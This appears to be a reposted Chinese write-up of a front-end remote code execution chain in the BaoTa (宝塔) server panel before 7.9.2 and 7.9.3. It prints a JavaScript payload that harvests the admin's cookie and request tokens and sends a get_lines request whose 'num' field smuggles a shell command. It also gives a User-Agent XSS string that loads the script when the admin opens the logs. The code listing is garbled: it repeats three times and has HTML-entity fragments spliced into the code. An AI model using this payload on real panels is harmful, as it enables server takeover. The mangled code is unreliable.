宝塔面板前台RCE
2022-10-29 09:59:41 Author: 利刃信安(查看原文) 阅读量:51 收藏

RCE1

版本 < 7.9.2

恶意 js

// NOTE(review): this listing is the write-up's exploit payload, reproduced
// verbatim. The page extraction has pasted it three times and left HTML-entity
// fragments ("amp;", "quot;") in the middle of the second and third copies, so
// the text below is not a runnable file; it is kept as-is as a reference for
// what the attack traffic looks like, not repaired.
//
// What the visible calls do:
//  - getCookie() reads document.cookie and extracts one named cookie;
//    the headers below call it for `request_token`;
//  - all_headers sends that value as `x-cookie-token` and reads the `token`
//    attribute of the panel's `#request_token_head` element as `x-http-token`
//    (presumably the panel's anti-CSRF tokens, harvested from the session of
//    whoever views the log page — confirm against the panel source);
//  - $.ajax() then GETs /ajax with action=get_lines and a `num` parameter that
//    carries shell metacharacters (`|echo ... > /www/wwwroot/1.txt|`); the
//    write-up implies `num` reaches a shell server-side in the versions it
//    lists (< 7.9.2) — this is the command-injection sink to verify.
//
// Defensive takeaways:
//  - detection: alert on /ajax requests with action=get_lines whose `num` is
//    not a plain integer, and on User-Agent or other logged fields containing
//    `<script` / `</textarea>` (the XSS carrier this page uses to get the
//    script into the admin's log view);
//  - mitigation: the page lists versions below 7.9.2 (7.9.3 for the third
//    variant) as affected; independently of version, validate `num` as an
//    integer before it can reach any command, and HTML-encode log fields
//    before rendering them in the panel.
//JQuery preload (optional)(function(){    var s = document.createElement('script');s.type = 'text/javascript';s.async = true;s.src = 'https://code.jquery.com/jquery-2.1.4.min.js';(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(s);})();
// cookielet cookies = document.cookie;
function getCookie(sKey) { if (!sKey) { return null; } return decodeURIComponent(document.cookie.replace(new RegExp("(?:(?:^|.*;)\\s*" +encodeURIComponent(sKey).replace(/[\-\.\+\*]/g, "\\//JQuery preload (optional)(function(){ var s = document.createElement('script');s.type = 'text/javascript';s.async = true;s.src = 'https://code.jquery.com/jquery-2.1.4.min.js';(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(s);})();
// cookielet cookies = document.cookie;
// getCookie: returns the decoded value of cookie `sKey`, or null when absent.
function getCookie(sKey) { if (!sKey) { return null; } return decodeURIComponent(document.cookie.replace(new RegExp("(?:(?:^|.*;)\\s*" +encodeURIComponent(sKey).replace(/[\-\.\+\*]/g, "\\$&") +"\\s*\\=\\s*([^;]*).*$)|^.*$"), "$1")) || null;}
// all_headers: request headers, including the harvested request_token values.
all_headers ={ "Accept":"*/*", "X-Requested-With":"XMLHttpRequest", "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36", "Connection":"close", "Accept-Encoding":"gzip, deflate", "dnt":"1", "sec-gpc":"1", "Cookie": cookies, "x-cookie-token": getCookie('request_token'), "Accept-Language":"zh-CN,zh;q=0.9,en;q=0.8", "x-http-token": $('#request_token_head').attr('token'), "Content-Type":"application/x-www-form-urlencoded;charset=UTF-8"}
// $.ajax: the injection request; `num` is the parameter carrying the command.
$.ajax({ url: "/ajax", type: "get", data: {"action":"get_lines","filename":"/etc","num":"|echo 'BT RCE test ZAC'> /www/wwwroot/1.txt|"} //shell command goes here , headers: all_headers, success: function (data) { console.info(data); }});amp;") +"\\s*\\=\\s*([^;]*).*$)|^.*//JQuery preload (optional)(function(){ var s = document.createElement('script');s.type = 'text/javascript';s.async = true;s.src = 'https://code.jquery.com/jquery-2.1.4.min.js';(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(s);})();
// (duplicate copy produced by the page extraction; see note at top)
// cookielet cookies = document.cookie;
function getCookie(sKey) { if (!sKey) { return null; } return decodeURIComponent(document.cookie.replace(new RegExp("(?:(?:^|.*;)\\s*" +encodeURIComponent(sKey).replace(/[\-\.\+\*]/g, "\\$&") +"\\s*\\=\\s*([^;]*).*$)|^.*$"), "$1")) || null;}
all_headers ={ "Accept":"*/*", "X-Requested-With":"XMLHttpRequest", "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36", "Connection":"close", "Accept-Encoding":"gzip, deflate", "dnt":"1", "sec-gpc":"1", "Cookie": cookies, "x-cookie-token": getCookie('request_token'), "Accept-Language":"zh-CN,zh;q=0.9,en;q=0.8", "x-http-token": $('#request_token_head').attr('token'), "Content-Type":"application/x-www-form-urlencoded;charset=UTF-8"}
$.ajax({ url: "/ajax", type: "get", data: {"action":"get_lines","filename":"/etc","num":"|echo 'BT RCE test ZAC'> /www/wwwroot/1.txt|"} //shell command goes here , headers: all_headers, success: function (data) { console.info(data); }});quot;), "$1")) || null;}
// (duplicate copy produced by the page extraction; see note at top)
all_headers ={ "Accept":"*/*", "X-Requested-With":"XMLHttpRequest", "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36", "Connection":"close", "Accept-Encoding":"gzip, deflate", "dnt":"1", "sec-gpc":"1", "Cookie": cookies, "x-cookie-token": getCookie('request_token'), "Accept-Language":"zh-CN,zh;q=0.9,en;q=0.8", "x-http-token": $('#request_token_head').attr('token'), "Content-Type":"application/x-www-form-urlencoded;charset=UTF-8"}
$.ajax({ url: "/ajax", type: "get", data: {"action":"get_lines","filename":"/etc","num":"|echo 'BT RCE test ZAC'> /www/wwwroot/1.txt|"} //shell command goes here , headers: all_headers, success: function (data) { console.info(data); }});

访问宝塔面板所部署的网站,并将请求的 User-Agent(UA)替换为下面的内容

</tExtArEa>">src=https://localhost/1.js></script>

到后台点击“日志”,触发 XSS,进而导致 RCE

命令执行结果

RCE2

版本 <7.9.2
原理与上面的一致,PoC 也相同

触发 Nginx 报错

到后台点日志-错误日志

验证结果

RCE3

版本 <7.9.3

可以确认存在 XSS 漏洞,但是要达成 RCE 有难度;我本地使用宝塔 7.6.0 验证时存在斜杠被替换的问题,暂且不表。

针对面板页面构造恶意 XSS

到安全-日志记录中去查找日志。

文章转载自:https://www.ankio.net/#/posts/79

